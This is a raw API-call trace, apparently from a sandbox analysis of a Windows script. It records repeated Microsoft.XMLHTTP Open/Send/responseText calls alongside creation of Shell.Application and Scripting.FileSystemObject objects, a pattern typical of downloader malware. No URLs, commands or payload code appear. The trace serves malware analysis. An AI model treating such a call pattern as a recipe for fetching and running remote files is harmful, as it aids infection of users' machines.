	[0281.140] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0281.140] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0281.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0281.140] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0281.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.141] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0281.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.141] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0281.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0281.427] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0281.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0281.427] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0281.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0281.427] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0281.427] SysStringLen (param_1=0x0) returned 0x0
	[0281.427] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0281.428] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0281.428] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0281.428] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0281.428] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0281.428] ??2@YAPEAX_K@Z () returned 0x62f350
	[0281.428] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0281.428] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0281.428] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0281.428] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0281.428] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0281.428] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0281.428] SysStringLen (param_1=0x0) returned 0x0
	[0281.428] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0281.431] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0281.431] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0281.431] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0281.431] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0281.431] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0281.431] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0282.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0282.183] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0282.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0282.185] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0282.185] SysStringLen (param_1=0x0) returned 0x0
	[0282.185] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0282.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0282.185] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0282.185] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0282.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0282.185] ??2@YAPEAX_K@Z () returned 0x62f330
	[0282.185] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0282.185] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0282.185] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0282.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0282.186] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0282.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0282.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0282.188] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0282.189] SysStringLen (param_1=0x0) returned 0x0
	[0282.189] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0282.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0282.189] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0282.189] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0282.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0282.189] ??2@YAPEAX_K@Z () returned 0x62f310
	[0282.189] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0282.189] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0282.189] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0282.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0282.189] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0282.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.190] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0282.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0282.190] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0282.190] SysStringLen (param_1=0x0) returned 0x0
	[0282.190] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0282.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0282.190] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0282.190] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0282.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7258) returned 0x0
	[0282.190] ??2@YAPEAX_K@Z () returned 0x62f330
	[0282.190] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7258, pUnkSite=0x62f330) 
	[0282.190] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0282.191] XMLHTTPRequest:IUnknown:Release (This=0x49c7258) returned 0x0
	[0282.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0282.191] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0282.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.191] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0282.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0282.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0282.191] SysStringLen (param_1=0x0) returned 0x0
	[0282.191] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0282.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0282.192] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0282.192] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0282.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0282.192] ??2@YAPEAX_K@Z () returned 0x62f310
	[0282.192] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
